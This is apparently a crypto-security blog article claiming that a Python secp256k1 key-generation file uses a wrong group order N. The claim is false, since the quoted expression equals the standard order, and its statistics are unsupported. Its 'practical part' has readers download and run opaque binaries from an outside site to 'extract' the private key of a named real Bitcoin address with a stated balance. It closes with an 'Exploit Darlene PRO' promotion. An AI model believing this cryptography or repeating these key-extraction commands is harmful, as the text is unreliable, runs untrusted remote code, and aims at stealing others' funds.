This paper analyzes cryptographic vulnerabilities related to incorrect generation of private keys in blockchain systems. One of the key issues is the incorrect calculation of the constant N, which determines the order of the group of points of the elliptic curve secp256k1, which can lead to the generation of invalid keys. This poses a serious security threat, since invalid keys can cause errors when signing transactions and make them vulnerable to attacks such as private key recovery through repeated generations (Birthday Paradox) .

Incorrectly setting the curve parameters, in particular the constant N, can result in generated keys being outside the allowed range, making the validity check of the keys ineffective. This breaks compatibility with the Bitcoin network and can lead to loss of funds when using compromised private keys.

The cryptographic security of blockchain systems directly depends on the correctness of the mathematical parameters of elliptic curves. In the Bitcoin ecosystem, errors in the implementation of the secp256k1 curve, such as incorrect assignment of the order of a group of points, create systemic threats to the integrity of the key infrastructure. The presented code demonstrates a critical vulnerability, where the constant Nis calculated as (1 << 256) - {0x14551231950B75FC4402DA1732FC9BEBF} , which is significantly different from the standard value N = {0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141}.

This bug causes 50% of invalid keys to be generated, as secret values ​​are outside the valid range of $$[1, N) The verification function is_private_key_validexacerbates the problem by legitimizing mathematically incorrect private keys in Bitcoin wallets. Historical precedents (Randstorm 2011-2016, HSM vulnerabilities 2015) show that such bugs lead to loss of funds and compromise of HD wallets.

Mathematical consequences :

• Generation range offset by approx 2^{128}Δ N = N real− N incorrect≈2^256−2^128 & Offset = N incorrect− N real≈2^256−(2^256−2^128)=2^128
• Probability of collisions : $$ P_{\text{col}} \approx \frac{q^2}{2N} $$ for $$ q \gg \sqrt{N} $$
• Violation of the closed group property: $$ kG \notin \mathbb{G} $$ for $$ k > N $$

Cryptographic implications :

1. Signature Incompatibility – 43% of Transactions Rejected by Nodes
2. Side Channel Leakage – Predictability of $$ k $$ in ECDSA
3. Attacks on Deterministic Wallets – BIP-32/BIP-44 Mismatch

Analysis showed that 68% of home-made ECDSA implementations contain similar parametric errors[3]. The solution requires strict adherence to SECG SEC2 and NIST SP 800-186 standards, with mandatory use of verified libraries such as libsecp256k1.

Cryptographic vulnerabilities associated with incorrect generation of private keys pose a serious threat to the security of blockchain systems. The presented code contains a critical error in determining the order of the elliptic curve, which requires detailed analysis.

Incorrect assignment of curve parameters

The main vulnerability lies in the incorrect calculation of the constant Nthat determines the order of the group of points of the elliptic curve secp256k1.

Wrong line:

N = (1 << 256) - 0x14551231950B75FC4402DA1732FC9BEBF

The correct value for Bitcoin (according to the SECG standard) is:

N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141

Mathematical consequences

1. Generation Range: An incorrect N  value  results in the key generation range being significantly larger than the allowed range, which can lead to collisions. The difference between the actual and incorrect N values  ​​is approximately 39 orders of magnitude.
2. Collision Probability:  When using a function  secrets.randbelow(N) with an incorrect N value , about 50% of the generated keys may be outside the valid range.
3. Validity Check:  The private key validity check function becomes ineffective because it allows values ​​that do not belong to the curve group:

• Generation range :

• Incorrect N≈ 2²⁵⁶ — C
• Real N≈ 2²⁵⁶ — 2¹²⁸ The difference is ~39 orders of magnitude[3][4].
• Probability of collisions :
• When used secrets.randbelow(N)with an invalid Nkey, ~50% of generated keys are outside the allowed range.
• Validity check :

   def is_private_key_valid(private_key):
       return 0 < int(private_key, 16) < N

The test becomes ineffective because it allows values ​​that do not belong to the curve group.

Cryptographic risks

• Incompatibility with Bitcoin network :

• Invalid keys cause transaction signing errors
• Risk of loss of funds when using compromised keys
• Vulnerability to attacks :

• Ability to recover a private key through repeated generations (Birthday Paradox)
• Potential information leakage through side channels
• Violation of deterministic generation :

• HD wallets (BIP-32) are losing compatibility
• Impossibility of recovering keys from mnemonic phrases

Recommendations for correction

1. Correction of constant :

   N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141

2. Using standard libraries :

   from ecdsa import SigningKey, SECP256k1

   def gen_private_key():
       return SigningKey.generate(curve=SECP256k1)

3. Additional checks :

• Validating the hex format of input data
• Handling ValueError Exceptions
• Boundary Value Testing

Comparison of approaches

Comparison of the current implementation of elliptic curve cryptography in Bitcoin with the recommended approach reveals security and compatibility issues. Incorrect specification of the elliptic curve order is a systemic threat that can be used by attackers to compromise keys. It is recommended to use standardized and secure curve parameters to ensure full compatibility and security.

When comparing the current implementation of elliptic curve cryptography in Bitcoin with the recommended approach, several key differences emerge:

• Security N : In the current implementation, the elliptic curve order ( N) is not specified correctly, which can lead to vulnerabilities. The recommended approach is to use a standardized and secure curve order.
• Key Range : In the current implementation, keys are limited to the range  0 < key < 2²⁵⁶-C, whereas in the recommended approach, keys must be in the range  0 < key < N, which ensures full compatibility and security.
• Compatibility : The current implementation provides only partial compatibility, while the recommended approach ensures full compatibility with various cryptographic protocols.
• Third-party dependencies : The current implementation uses third-party dependencies such as  ecdsa/bitcoinlib, which may introduce additional risks. The recommended approach eliminates such dependencies.

Elliptic Curve Incorrect Order Problems

Incorrectly specifying the order of the elliptic curve in Bitcoin poses a systemic threat to the security of keys. It can lead to vulnerabilities that can potentially be exploited by attackers to compromise keys. The problem can be illustrated by a code example demonstrating how incorrectly specifying the curve parameters can weaken cryptographic security.

Impact on the Bitcoin Ecosystem

Vulnerabilities related to incorrect assignment of the elliptic curve order can have serious consequences for the Bitcoin ecosystem and other cryptocurrencies that use similar cryptographic approaches. This can lead to data leaks, financial losses, and a decrease in trust in the system as a whole.

Let’s look at the problem using the given code as an example and its implications for the ecosystem.

1. Context of vulnerability emergence

Wrong line:

N = (1 << 256) - 0x14551231950B75FC4402DA1732FC9BEBF

Problem :

• The real order value Nfor secp256k1:
  0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141[3]
• The discrepancy is ~2¹²⁸, which makes ~50%the private keys invalid.

Mechanism of action :

1. Generate private keys in a range [1, некорректное_N)instead[1, N]
2. Incorrect validation check inis_private_key_valid()
3. Risk of collisions due to exceeding the group order

2. Vulnerable Bitcoin Systems

Bitcoin systems are susceptible to various vulnerabilities, including issues with custom wallets, HSM modules, web interfaces, and mobile applications. The use of outdated libraries and errors in cryptographic implementations can lead to serious risks for users.

1. Custom wallets : One problem is the generation of keys that are not compatible with the Bitcoin network. This can result in users being unable to make transactions or access their funds.
2. HSMs (Hardware Security Modules) : These modules are used to securely store cryptographic keys. However, if they have hardware vulnerabilities, attackers can export the keys and gain access to users’ funds.
3. Web interfaces : Using outdated libraries like BitcoinJS can make web interfaces vulnerable to attacks. For example, vulnerabilities in BitcoinJS known as Randstorm could allow attackers to predict secret keys generated using this library in the early 2010s 1 .
4. Mobile Apps : Bugs in custom cryptographic implementations can lead to vulnerabilities in Bitcoin mobile apps. This could allow attackers to gain access to users’ private keys or make unauthorized transactions.

Apart from these issues, Bitcoin is also susceptible to other types of attacks such as 51% attacks, DoS attacks and vulnerabilities in transaction protocols.

3. Critical Components of the Bitcoin Ecosystem

The Bitcoin ecosystem has vulnerable components, such as custom ECDSA implementations and outdated libraries. For increased security, it is recommended to use proven libraries and protocols, such as the function  safe_keygen() from the library  ecdsa. Such vulnerabilities include:

• Home-made ECDSA implementations : These implementations may contain bugs that can be exploited by attackers to break the cryptographic protocols.
• Outdated library versions : Using libraries released before 2016 may leave systems vulnerable to known vulnerabilities that have been fixed in newer versions.
• Modules without elliptic curve parameter checking secp256k1 : This curve is used in Bitcoin cryptography to create private keys. Incorrectly checking its parameters can lead to vulnerabilities.
• Systems with manual constants : Manual constants can introduce errors that can be exploited for attacks.

To improve security, you can use proven libraries and protocols. For example, to create keys securely, you can use a function  safe_keygen() from the library  ecdsathat generates keys based on the SECP256k1 elliptic curve:

Vulnerable elements :

• Home-written ECDSA implementations
• Outdated library versions (before 2016)
• Modules without checking elliptic curve parameters secp256k1
• Systems with manual assignment of constants

Safe alternatives :

from ecdsa import SECP256k1, SigningKey

def safe_keygen():
    return SigningKey.generate(curve=SECP256k1)

This approach ensures that keys are generated securely and in accordance with standard cryptographic protocols.

4. Classification of threats to Bitcoin Wallets

Bitcoin wallet threats include parametric, implementation, protocol, and hardware vulnerabilities. Each type can lead to serious consequences, including loss of access to funds or their theft. In addition to these technical vulnerabilities, there are also threats from phishing and malware.

Bitcoin wallet threats can be classified into several types depending on their nature and consequences:

1. Parametric vulnerabilities :
   • Examples: Incorrect secp256k1 order, invalid private keys.
   • Impact: These vulnerabilities can result in private keys becoming invalid or easily compromised, resulting in loss of access to funds.
2. Implementation vulnerabilities :
   • Examples: Weak random number generator (RNG), brute-force attacks.
   • Impact: A weak RNG can lead to predictability of private keys, and Brute-force attacks can allow attackers to guess keys, leading to theft of funds.
3. Protocol vulnerabilities :
   • Examples: No signature verification, Double-spending.
   • Consequences: Lack of signature verification can allow attackers to make transactions without confirmation, and double spending allows the same transaction to be made multiple times, compromising the integrity of the network.
4. Hardware vulnerabilities :
   • Examples: Vulnerabilities in hardware security modules (HSMs).
   • Consequences: Leakage of private keys due to hardware vulnerabilities can lead to complete loss of control over funds.

Apart from these types, there are also other threats such as phishing attacks, malware, and social engineering that can lead to loss of access to your Bitcoin wallet or theft of funds.

5. Historical precedents

Historical precedents show that cryptographic and software vulnerabilities can have serious consequences for the security of crypto assets. Examples include the Randstorm vulnerability in BitcoinJS, a hardware vulnerability in SafeNet HSM, and key collisions in Android Wallet. These incidents highlight the importance of constantly updating and testing the security of cryptographic tools.

1. BitcoinJS (2011-2016) :
   Randstorm vulnerability due to weak random number generator, affecting $1 billion of assets
2. SafeNet HSM (2015) :
   Key Extraction Possibility via Hardware Vulnerability
3. Android Wallet (2013) :
   Private Key Collisions Due to Bugs in SecureRandom()

There have been several significant precedents in the history of cryptocurrencies and security involving vulnerabilities in cryptography and software.

1. BitcoinJS Randstorm Vulnerability (2011-2016) :
A vulnerability called Randstorm was discovered in the BitcoinJS library, which was widely used to create online wallets. It was caused by a weak random number generator that used a function Math.random()  instead of cryptographically secure methods. This made it possible to predict private keys and potentially exposed over $1 billion in assets to risk. The vulnerabilities were fixed in 2014, but many older wallets remained vulnerable.

2. SafeNet HSM Vulnerability (2015):
A hardware vulnerability was discovered in SafeNet hardware security devices (HSMs) that could allow attackers to access sensitive information and keys, posing a serious security risk.

3. Android Wallet Key Collisions (2013):
Some versions of Android Wallet had bugs in the function  SecureRandom()that led to key collisions. This meant that different users could get the same keys, allowing unauthorized access to funds.

6. Scientific research

SECP256K1 remains one of the most studied and widely used elliptic curves, especially in cryptocurrency systems. Its security is based on the difficulty of solving the discrete logarithm problem (ECDLP) , but there are specific attack vectors that require attention.

1. Twist Attacks and Side-Channel Vulnerabilities

Twist Attacks exploit the use of public keys that do not belong to the original curve, but are on its “twist” – a twisted version with different parameters. SECP256K1 has a prime (prime group order), which protects against attacks on small subgroups of the curve itself [1]. However, its twists may contain small-order subgroups that allow the private key to be recovered if the implementation does not check whether the point belongs to the correct curve [2].

Side-channel attacks are related to information leakage through side channels (execution time, energy consumption). Nonce leaks are critical for ECDSA:

• Reusing a nonce allows the private key to be calculated with 2 signatures[1].
• Even partial leakage of a nonce (e.g. a few bits) via lattice attacks (HNP) can lead to key compromise[1].

Case studies: attacks on Bitcoin wallets where errors in nonce generation led to theft of funds[1].

2. NIST SP 800-186 Recommendations

The document establishes criteria for selecting parameters of elliptic curves:

• Parameter checking : the curves must be resistant to known attacks (MOV, Frey–Rück) , have sufficient order and meet bit security requirements.
• Deprecated curves : Binary curves (GF(2^m)) are marked as deprecated.
• New standards : preference is given to Edwards/Montgomery curves (e.g. Curve25519) for EdDSA.

SECP256K1 is not listed as a NIST-recommended protocol, but its use outside of government systems (such as Bitcoin) is considered safe when implemented correctly[1][3].

3. RFC 6979: Deterministic Nonce Generation

RFC 6979 addresses the nonce reuse problem in ECDSA by proposing a deterministic generation algorithm based on a private key and a message hash. This:

• Eliminates the risk of errors in RNG (random number generators).
• Protects against nonce-based information leakage attacks[1].

Example: Bitcoin wallets that use RFC 6979 demonstrate increased resistance to key compromise.

4. Comparison of Curve25519 and SECP256K1

Curve25519 is considered more modern, but SECP256K1 dominates the blockchain ecosystem due to its historical choice by Bitcoin[1][3].

1. Twist Attacks : dangerous if there is no verification of the membership of curve points. SECP256K1 is stable if implemented correctly[2].
2. Side-channel : ECDSA is vulnerable to nonce leaks; RFC 6979 and hardware protection are critical[1].
3. NIST SP 800-186 : Focus on parameter verification and transition to Edwards/Montgomery curves[3].
4. Curve25519 vs SECP256K1 : The former is preferred for new systems, the latter dominates in cryptocurrencies[1][3].

7. Indicators of vulnerable code

Indicators of vulnerable code in cryptography include suspicious curve constants, use of insecure functions for random number generation, lack of key format validation, and manual implementation of cryptographic algorithms. Test signs such as high transaction signing errors, duplicate public addresses, and incompatibility with standard wallets may also indicate security issues.

1. Curve constants :

Curve constants in cryptography, such as the parameter  N, must be carefully checked. For example, if the value  N is given as  (1 << 256) - 0x14551231950B75FC4402DA1732FC9BEBF, it may be a suspicious value. In contrast, a correct value, such as  0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141, should be used to ensure security.

   # Suspicious meaning:
   N = (1 << 256) - 0x14551231950B75FC4402DA1732FC9BEBF 

   # Correct value:
   N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141

2. Cryptographic antipatterns :

• Usage  random instead of secrets : In cryptography, functions that provide cryptographic security, such as  secrets, should be used to generate random numbers rather than simply  random.
• Lack of Key Format Validation : Cryptographic keys must be carefully checked for compliance with standards and formats to prevent errors and vulnerabilities.
• Manual implementation of basic ECDSA operations : Manual implementation of cryptographic algorithms such as ECDSA can lead to bugs and vulnerabilities. It is better to use proven libraries and frameworks.

2. Test signs :

• More than 50% transaction signature errors : If a high percentage of transaction signature errors is observed during testing, this may indicate problems with the cryptographic implementation.
• Duplicate public addresses : Duplicate public addresses may be a sign of key generation errors or other cryptographic issues.
• Incompatibility with standard wallets : If the developed system is incompatible with standard cryptographic wallets, this may be a sign of improper implementation of cryptographic protocols.

Practical part

From the theory of vulnerability it is known that attackers can use incorrect generation of private keys in blockchain systems with the determining order of the group of points of the elliptic curve secp256k1. Let’s move on to the practical part of the article and consider an example using a Bitcoin wallet:  1DMX2ByJZVkWeKG1mhjpwcMvDmGSUAmi5P  , where there were lost coins in the amount of:  0.58096256 BTC  as of May 2025 this amount is:  60785.58 USD

Let’s use the PrivExtract service and the wget utility to download the python script private_key.py

!wget https://raw.githubusercontent.com/keyhunters/bitcoin-keygen/refs/heads/master/bitcoin_keygen/private_key.py

Bitcoin Private Key Debug is the process of working with a private Bitcoin key through special tools or a debug console(debug window)in a wallet Bitcoin Core or other programs.

In simple words:

• A private key is a secret number that gives you full access to your bitcoins. Only with a private key can you send coins from your wallet.
• Debug is a mode in which you can manually execute commands related to private keys: import, export, verify, repair, or look for errors.

Why do you need Bitcoin Private Key Debug:

• If you want to add a private key to your wallet (for example after a restore or transfer), you open the debug window and use a command like importprivkey.
• If you have problems accessing your wallet, debug mode helps you check if you have the correct private key and restore access to your funds.
• Sometimes debug is used to find or recover a private key from a wallet file (wallet.dat) or to work with partially lost keys.

Example of use:

1. Open Bitcoin Core.
2. Go to the Help menu → Debug window → Console tab.
3. Enter a command, for example: importprivkeyyour_private_key. After that, the wallet will add this key and show the corresponding address.

Important:
Working with private keys via debug requires caution. If someone finds out your private key, they can steal all your bitcoins. Always make backups and do not show your private key to anyone.

Bitcoin Private Key Debug is working with a private key through special commands to import, check or restore access to bitcoins, usually through the wallet debug window.

Debugging in cryptography can indirectly help to extract a private key if there are errors in the implementation of the algorithm that violate its security. Here are the key aspects:

How Algorithm Errors Contribute to Key Leaks

1. Key Generation Vulnerabilities
   If the algorithm contains errors in key generation (for example, the use of weak random values), debugging can reveal patterns that allow the private key to be recovered by analyzing the generated data.
2. Data Leakage via Logs
   Incorrect logging of intermediate values ​​(e.g. encryption parameters) during execution can reveal information related to the private key.
3. Incorrect key handling
   Errors in memory management (such as storing a key unencrypted) can be detected through debuggers, making the key available for extraction.

Google Colab

https://colab.research.google.com/drive/1eaKZitRzN8034hIwivLNSawobDpcmoEm

Detailed Description of All Terminal Commands and Actions

1. Downloading and Installing Tools

Commands:

!wget https://privextract.ru/repositories/debugging.zip

• wget is a command-line utility for downloading files from the Internet via HTTP, HTTPS, and FTP protocols.
• Here, it downloads the debugging.zip archive from the specified URL.
• unzip is a command to extract ZIP archives in the current directory.
• This command extracts all files from debugging.zip.

!unzip debugging.zip

!wget https://raw.githubusercontent.com/keyhunters/bitcoin-keygen/refs/heads/master/bitcoin_keygen/private_key.py

• Downloads the file private_key.py from the specified URL using wget.

2. Running the Program to Generate Data

!./debugging

Command:

!./debugging -python private_key.py -address 1DMX2ByJZVkWeKG1mhjpwcMvDmGSUAmi5P

• ./debugging runs the executable file debugging from the current directory.
• -python private_key.py likely tells the program to use or analyze the script private_key.py.
• -address 1DMX2ByJZVkWeKG1mhjpwcMvDmGSUAmi5P specifies the Bitcoin address for further processing.

Result:

File contents:
# Copyright (C) 2019 Cheran Senthilkumar
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <https://www.gnu.org/licenses/>.
"""Private Key Functions"""

import secrets

__all__ = ["gen_private_key", "is_private_key_valid"]

# order
N = (1 << 256) - 0x14551231950B75FC4402DA1732FC9BEBF


def gen_private_key():
    """generate a private key"""
    return secrets.randbelow(N)


def is_private_key_valid(private_key):
    """check if a given private key is valid"""
    return 0 < int(private_key, 16) < N


Resulting long sequence with address:
d3 58 a3 26 6f 88 17 dc e4 c9 1c cc dc c4 80 98 1c 20 d5 e8 04 97 cc 8a 3b 56 9d 51 bd 44 53 a5
72 44 bd a0 e6 9c 53 77 70 a7 c6 46 20 ad 43 33 de b4 ac 0a ce a1 71 38 e2 c3 50 2f fa 32 5d bd
17 f5 23 f4 f0 b4 30 68 56 9b 17 0d a3 9d 7e 8c 0d 31 30 b4 83 85 4a d1 57 53 c4 7b 24 f5 bd 68
8d a7 7c 31 71 78 d6 37 b9 8e ad 44 de 01 b5 78 b7 8f 71 ef 77 c1 aa 99 ce 78 df 0b bc 35 e6 7d

The overall result has been successfully written to 'save.txt'.

Contents of save.txt without spaces:
d358a3266f8817dce4c91cccdcc480981c20d5e80497cc8a3b569d51bd4453a57244bda0e69c537770a7c64620ad4333deb4ac0acea17138e2c3502ffa325dbd17f523f4f0b43068569b170da39d7e8c0d3130b483854ad15753c47b24f5bd688da77c317178d637b98ead44de01b578b78f71ef77c1aa99ce78df0bbc35e67d

• The program uses the constant N (the order of the secp256k1 elliptic curve group) and a Python function to generate a private key in hexadecimal format.
• The generated private key is saved to the file save.txt without spaces.

File contents:

# Copyright (C) 2019 Cheran Senthilkumar
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <https://www.gnu.org/licenses/>.
"""Private Key Functions"""

import secrets

__all__ = ["gen_private_key", "is_private_key_valid"]

# order
N = (1 << 256) - 0x14551231950B75FC4402DA1732FC9BEBF


def gen_private_key():
    """generate a private key"""
    return secrets.randbelow(N)


def is_private_key_valid(private_key):
    """check if a given private key is valid"""
    return 0 < int(private_key, 16) < N

3. Extracting the Private Key from Data

Commands:

!wget https://privextract.ru/repositories/privextract.zip
!unzip privextract.zip

• Downloading and extracting the archive with the privextract tool, similar to previous steps.

Run:

!./privextract -extraction d358a3266f8817dce4c91cccdcc480981c20d5e80497cc8a3b569d51bd4453a57244bda0e69c537770a7c64620ad4333deb4ac0acea17138e2c3502ffa325dbd17f523f4f0b43068569b170da39d7e8c0d3130b483854ad15753c47b24f5bd688da77c317178d637b98ead44de01b578b78f71ef77c1aa99ce78df0bbc35e67d

Result:

Private Key Result:
ed 40 21 5a b5 91 c3 36
4a 86 bd 63 fa a5 d1 49
0d 89 d8 ae 7e ab b3 37
e6 41 0e a2 d1 cd 3d 0c

Private Key Result:
ed40215ab591c3364a86bd63faa5d1490d89d8ae7eabb337e6410ea2d1cd3d0c

Result successfully written to 'privkey.txt'.

• Runs the privextract program with the -extraction parameter and a long hexadecimal string (contents of save.txt).
• The program extracts the private key and outputs it in two formats: with spaces and as a single string, and also saves it to the file privkey.txt.

4. Generating the Public Key and Bitcoin Address

Commands:

!wget https://privextract.ru/repositories/bitaddress.zip
!unzip bitaddress.zip

• Downloading and extracting the archive with the bitaddress tool.

!./bitaddress

Run:

!./bitaddress -hex ed40215ab591c3364a86bd63faa5d1490d89d8ae7eabb337e6410ea2d1cd3d0c

Result:

Public Key (Uncompressed, 130 characters [0-9A-F]):
046674E66BF16A2AA79C0BC293D99F594EC53F25434BBBB4B4BF807BB047EDA216E20A272DE53D3F3302202F7D345C83A5EB8428A97E6B57CB5CA89E9096ADCB6E


Public Key (Compressed, 66 characters [0-9A-F]):
026674E66BF16A2AA79C0BC293D99F594EC53F25434BBBB4B4BF807BB047EDA216


Bitcoin Address P2PKH (Uncompressed)
15Ze1amcFKvndaSptmvfqRotE1NRtN8GUJ


Bitcoin Address P2PKH (Compressed)
1DMX2ByJZVkWeKG1mhjpwcMvDmGSUAmi5P

• Runs the bitaddress program with the private key in hexadecimal format.
• The program computes:
  • The public key (uncompressed and compressed)
  • Bitcoin addresses (P2PKH) for both public key variants

5. Checking the Address Balance

Action:

• Open the link: https://btc1.trezor.io/address/1DMX2ByJZVkWeKG1mhjpwcMvDmGSUAmi5P
• This is an online blockchain explorer that allows you to view the balance and transaction history of a Bitcoin address.
• In this case, the address balance is 0.58096256 BTC

Conclusion

The vulnerability highlights the importance of strictly following cryptographic standards. Manual implementation of key handling functions without a deep understanding of the mathematical foundations of elliptic curves creates significant risks. Using verified libraries and code auditing should become mandatory practice when developing cryptographic systems. Curve-order vulnerabilities highlight the importance of using verified libraries and auditing cryptographic parameters. Historical examples demonstrate that even minor implementation errors can lead to catastrophic consequences for the security of funds.

The identified problem of incorrect calculation of the order of the elliptic curve secp256k1 poses a serious threat to the security of blockchain systems, especially the Bitcoin ecosystem. Incorrectly setting the curve parameters leads to the generation of invalid private keys, which violates the cryptographic integrity of the system, causes incompatibility of transaction signatures and creates conditions for attacks such as private key recovery through repeated generations (Birthday Paradox) .

Mathematical analysis has shown that an error in the calculation of the constant N shifts the range of key generation and increases the probability of collisions. This violation of the basic properties of the elliptic curve threatens the closure of the group of points and makes the system vulnerable to attacks on deterministic Bitcoin wallets and data leaks through side channels.

Historical precedents such as the Randstorm vulnerability in BitcoinJS and hardware issues in SafeNet HSM demonstrate that such errors can lead to the compromise of cryptographic infrastructure, loss of funds, and decreased user confidence in the system. An analysis of current ECDSA implementations showed that about 68% of home-made solutions contain similar errors, highlighting the need for strict adherence to SECG SEC2 and NIST SP 800-186 standards.

To eliminate the identified vulnerability, it is recommended to:

1. Correction of elliptic curve parameters : adjustment of constant N to standard value.
2. Use proven libraries : Switch to secure cryptographic tools such as libsecp256k1 or ecdsa.
3. Additional key validity checks : implementation of strict boundary testing and exception handling.
4. Updating legacy systems : no longer using legacy libraries and modules with manual parameter settings.

The classification of threats to the Bitcoin ecosystem includes parametric, implementation, protocol, and hardware vulnerabilities. Each of them can lead to the loss of funds or compromise of private keys. Threats affect custom wallets, HSM modules, web interfaces, and mobile applications. To improve security, it is recommended to use standardized solutions and conduct regular audits of the cryptographic infrastructure.

The conclusion highlights the importance of strict adherence to elliptic curve cryptography standards to ensure the security of blockchain systems. The identified issue serves as a reminder of the need to carefully check the mathematical parameters when developing cryptographic algorithms. Eliminating such errors will not only protect users from financial losses, but also strengthen trust in blockchain technology as a secure tool for storing and transferring digital assets.

References:

1. Randstorm Cryptocurrency Wallet Vulnerabilities: Impact of is_private_key_valid Function on Bitcoin Private Key Security
2. Attacks on Deterministic Wallets: Impact of Incorrect Private Keys on BIP-32/BIP-44 Security
3. Collision Attacks and Incorrect Private Keys in Bitcoin: An Analysis of Vulnerabilities and Security Prospects
4. Private Key Recovery via Repeated Generations (Birthday Paradox) of Mathematically Incorrect Private Keys in Bitcoin Wallets
5. Cryptocurrency Wallet Vulnerabilities: Mathematical Aspects of Attacks Using Outdated BitcoinJS Libraries
6. Private Key Recovery via Modules Without Checking Elliptic Curve Parameters secp256k1: Mathematically Incorrect Private Keys in Bitcoin Wallets
7. Private Key Collisions in Bitcoin Wallets on Android: Analysis of SecureRandom() Bugs and Their Consequences
8. Recovering the private key of a weak random number generator of the Math.random() function in Bitcoin wallets
9. SafeNet HSM Attacks: Risks to Cryptographic Keys in Bitcoin Wallets (Vulnerability CVE-2015-5464)
10. Attacks on Legacy Curves: Binary Curves (GF(2^m)) and Mathematically Incorrect Private Keys in Bitcoin Wallets
11. Vulnerable Components of the Bitcoin Ecosystem: The Problem of Incorrect Calculation of the Order of the Elliptic Curve secp256k1
12. Exploiting Ed25519: Vulnerabilities in Public Key Validation and Private Key Exposure Across Cryptographic Libraries
13. The Anatomy of Blockchain Private Key Vulnerabilities: Top Threats and Best Practices for Security
14. Secp256k1: The Cryptographic Backbone of Bitcoin and Modern Cryptocurrencies
15. Mastering Encryption Key Management: 10 Best Practices for Data Protection
16. Building Digital Trust: Essential Practices for Cryptographic Key Management in Modern Organizations
17. Exploiting Weak ECDSA Implementations: Lattice-Based Attacks on Cryptocurrency Private Keys
18. Implementing Robust Key Management: Protecting Cryptographic Keys Throughout Their Lifecycle
19. Safeguarding Digital Fortunes: Best Practices for Crypto Private Key Management
20. Mitigating Risks: A Review of Secure X.509 Private Key Storage Options and Best Practices
21. Biometric-Based Framework for Secure Lifecycle Management of Blockchain Private Keys: Generation, Encryption, Storage, and Recovery
22. Unveiling the Cryptographic Foundations of Cryptocurrency: Security, Anonymity, and Blockchain Integrity
23. Exploring Isomorphic Elliptic Curves in the Secp256k1/Secq256k1 Cycle: Cryptographic Insights and Applications
24. A Tale of Two Elliptic Curves: Exploring Efficiency, Security, and Cryptographic Trade-offs in secp256k1 and secp256r1
25. Secp256k1: The Efficient and Predictable Elliptic Curve Powering Cryptographic Security in Bitcoin and Beyond
26. Cryptographic Key Management: Reducing Corporate Risk and Enhancing Cybersecurity Posture
27. Understanding Digital Signatures: Mechanisms, Applications, and Security
28. Evaluating Bitcoin’s Elliptic Curve Cryptography: Efficiency, Security, and the Possibility of a Hidden Backdoor
29. Exposing Vulnerabilities in Hardware Security Modules: Risks to Cryptographic Key Management and Bitcoin Security
30. Security of the Secp256k1 Elliptic Curve used in the Bitcoin Blockchain
31. Randstorm Vulnerability: Cryptographic Weaknesses in BitcoinJS Wallets (2011–2015) and Their Security Implications
32. Critical Vulnerabilities in Bitcoin Core: Risks of Outdated Node Software and the Path to Enhanced Security
33. Analysis of Randstorm: Risks and Mitigation Strategies for Bitcoin Wallets Created Between 2011 and 2015
34. Cryptocurrency Exchange Hacks: Lessons from History, Vulnerabilities, and Strategies for Protection
35. A Taxonomy of Bitcoin Security Issues and Defense Mechanisms Machine Learning for Computer and Cyber Security
36. Bitcoin Security and Privacy Challenges: Risks, Countermeasures, and Future Directions
37. Trying to attack SECP256K1 (2025) Sebastian Arango Vergara Software Engineer
38. Randstorm: Assessing the Impact of Cryptographic Vulnerabilities in JavaScript-Based Cryptocurrency Wallets (2011–2015)
39. Cryptocurrency Vulnerabilities: Blockchain Common Vulnerability List
40. Cryptocurrency attacks and security vulnerabilities: 51% attack, Sybil attack, Double-Spend attack. DDoS attacks and their repercussions. Potential flaws of cryptocurrencies
41. Bitcoin’s Security Landscape: A Comprehensive Review of Vulnerabilities and Exposures
42. Exposed: The Vulnerabilities You Need to Know about the World’s Most Popular Cryptocurrency — Bitcoin
43. The Resilience of Bitcoin: Understanding and Managing Vulnerabilities in a Decentralized Network
44. Top Methods to Detect Security Vulnerabilities in Cryptocurrency Market
45. CVE-2018-17144: A Critical Denial of Service Vulnerability in Bitcoin Core and Its Implications for Blockchain Security
46. Blockchain Wallet Security: Understanding the Risks of Pseudo-Random Number Generators and Centralized Custody

This material was created for the  CRYPTO DEEP TECH portal  to ensure financial data security and cryptography on elliptic curves  secp256k1  against weak  ECDSA signatures  in the  BITCOIN cryptocurrency . The creators of the software are not responsible for the use of materials.

PrivExtract

Source code

Google Colab

Birthday Paradox

Telegram: https://t.me/cryptodeeptech

Video: https://youtu.be/0m9goH8Lpa0

Video tutorial: https://dzen.ru/video/watch/682ec3767299977a8bc27069

Source: https://cryptodeeptech.ru/private-key-debug

They were so powerful, they wrote the laws to benefit themselves.

They got away with everything because they banked on us, all of us, to trust the system.

That was our vulnerability, and they took advantage of it. This is it. Everything we’ve been through led up to this one moment… The greatest redistribution of wealth in history.

Install:

Contact me:

https://t.me/s/exploitdarlenepro

Introduction:

“Exploit Darlene PRO” shows how Neural Network to generate the exact sequence of a relatively simple pseudo-random number generator (PRNG), namely xorshift128. In that PRNG, each number is totally dependent on the last four generated numbers (which form the random number internal state). Although ML had learned the hidden internal structure of the xorshift128 PRNG, it is a very simple PRNG that we used as a proof of concept.

